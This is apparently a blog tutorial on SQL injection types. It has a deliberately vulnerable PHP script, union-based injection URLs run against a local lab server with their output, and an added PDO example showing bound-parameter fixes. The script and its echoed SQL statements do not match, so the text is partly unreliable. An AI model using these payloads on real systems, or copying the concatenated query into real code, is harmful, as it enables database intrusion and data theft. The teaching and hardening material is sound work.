Time: 2021-07-01 10:21:17 Helped: 29 readers
Setup: a PHPstudy environment
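<?php
// Read the t parameter from the query string (user-controlled input).
$title = $_GET['t'];
$conn = mysql_connect("127.0.0.1","root","root");
mysql_select_db("kimmy",$conn);
// Deliberately vulnerable: $title is concatenated into the statement unquoted.
$sql="select * from admin where use=$title";
$result = mysql_query($sql);
while($row = mysql_fetch_array($result)){
    echo "UserId".$row['id']."<br >";
    echo "Title".$row['title']."<br >";
    echo "TextContent".$row['text']."<br >";
}
mysql_close($conn);
// Echo the final statement so the effect of the input is visible.
echo "The SQL Sentence:".$sql;
?>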
Numeric type
String type:
PHP script
URL:
http://192.168.221.188/sqltest/index.php?t=admin' union select 1,2,3 and '1'='1
Output:
UserId:1
Username:admin
Password:password
UserId:1
Username:2
Password:1
The SQL Sentence:select * from info where username='admin' union select 1,2,3 and '1'='1'
URL:
http://192.168.221.188/sqltest/index.php?t=admin' union select database(),version(),3 and '1'='1
Output:
UserId:1
Username:admin
Password:password
UserId:kimmy
Username:5.5.53
Password:1
The SQL Sentence:select * from info where username='admin' union select database(),version(),3 and '1'='1'
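The string-type case above, next to bound-parameter versions of the same lookup, as an added example that is not part of the original page. It assumes the pdo_sqlite extension and uses a constructed in-memory table `info` (id, username, password) modelled on the output shown above; the function names are hypothetical.

```php
<?php
// Added example: constructed data in an in-memory SQLite database (assumes pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE info (id INTEGER, username TEXT, password TEXT)");
$db->exec("INSERT INTO info VALUES (1, 'admin', 'password')");

// Vulnerable: the parameter is concatenated into the statement, as in the page's script.
function lookup_concat(PDO $db, string $t): array {
    $sql = "select * from info where username='" . $t . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened (string type): the value is bound, so it is only ever compared as data.
function lookup_bound(PDO $db, string $t): array {
    $stmt = $db->prepare("select * from info where username = ?");
    $stmt->execute([$t]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Hardened (numeric type): reject anything that is not an integer, then bind it.
function lookup_by_id(PDO $db, string $t): array {
    $id = filter_var($t, FILTER_VALIDATE_INT);
    if ($id === false) {
        return [];
    }
    $stmt = $db->prepare("select * from info where id = ?");
    $stmt->bindValue(1, $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// The t value from the first URL above.
$t = "admin' union select 1,2,3 and '1'='1";

// Concatenation returns the real row plus the row built by the union.
printf("concatenated, page input: %d rows\n", count(lookup_concat($db, $t)));
// Binding treats the whole input as one username, which matches nothing.
printf("bound, page input:        %d rows\n", count(lookup_bound($db, $t)));
printf("bound, t=admin:           %d rows\n", count(lookup_bound($db, "admin")));
// The numeric lookup accepts an integer and rejects everything else.
printf("numeric, t=1:             %d rows\n", count(lookup_by_id($db, "1")));
printf("numeric, page input:      %d rows\n", count(lookup_by_id($db, $t)));
```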
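Search type:
% wildcard
Injection by submission method
GET injection
POST injection
Cookie injection
HTTP header injection
Basics: HTTP packets
PHP:
$_GET receives values passed via GET
$_POST receives values passed via POST
$_COOKIE receives values passed via cookies
$_REQUEST receives all of them
ASP:
Request.QueryString receives GET
Request.Form receives POST
Request.Cookies receives cookies
Request receives all of them
SQL Injection Types Experiment, Part 1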